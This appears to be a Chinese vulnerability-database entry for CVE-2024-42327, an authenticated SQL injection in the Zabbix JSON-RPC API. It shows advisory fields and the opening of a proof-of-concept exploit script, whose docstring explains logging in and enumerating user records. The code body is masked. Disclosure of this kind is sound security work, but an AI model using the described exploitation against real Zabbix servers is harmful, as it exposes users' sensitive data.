Zabbix认证后SQL注入漏洞(CVE-2024-42327)

基本字段

漏洞编号:
SSV-99902
披露/发现时间:
未知
提交时间:
2024-12-03
漏洞等级:
漏洞类别:
SQL 注入
影响组件:
Zabbix
(影响版本较多,点击查看)
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
CVE-2024-42327
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 共获得  0KB
暂未开放
共 0  兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import requests
import argparse
"""
Exploit Script for CVE-2024-42327
Author: Alejandro Ramos (@aramosf)
Assisted by: ChatGPT
Date: 2024-12-01
This script demonstrates the exploitation of the vulnerability CVE-2024-42327,
registered by Zabbix as ZBX-25623. This vulnerability allows unauthorized
access to sensitive user information by abusing the JSON-RPC API.
References:
- CVE: CVE-2024-42327
- Zabbix Issue Tracker: https://support.zabbix.com/browse/ZBX-25623
Functionality:
1. Logs in to the Zabbix JSON-RPC API to obtain a session token using a valid username and password.
2. Iterates over a range of user IDs (1 to 40), fetching user details for each ID.
Arguments:
- `-u` or `--url`: The API endpoint URL (e.g., http://192.168.201.128/api_jsonrpc.php).
- `-n` or `--username`: The username for authentication.
- `-p` or `--password`: The password for authentication.
Example:
python script.py -u "http://192.168.201.128/api_jsonrpc.php" -n "aramosf" -p "Hola1234"
Disclaimer:
This script is provided for educational purposes only. Unauthorized exploitation
of vulnerabilities is illegal and unethical. Use responsibly.
"""
def main(url, username, password):
# First request: Login to get the session token
headers = {
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 0 兑换

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 6428
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负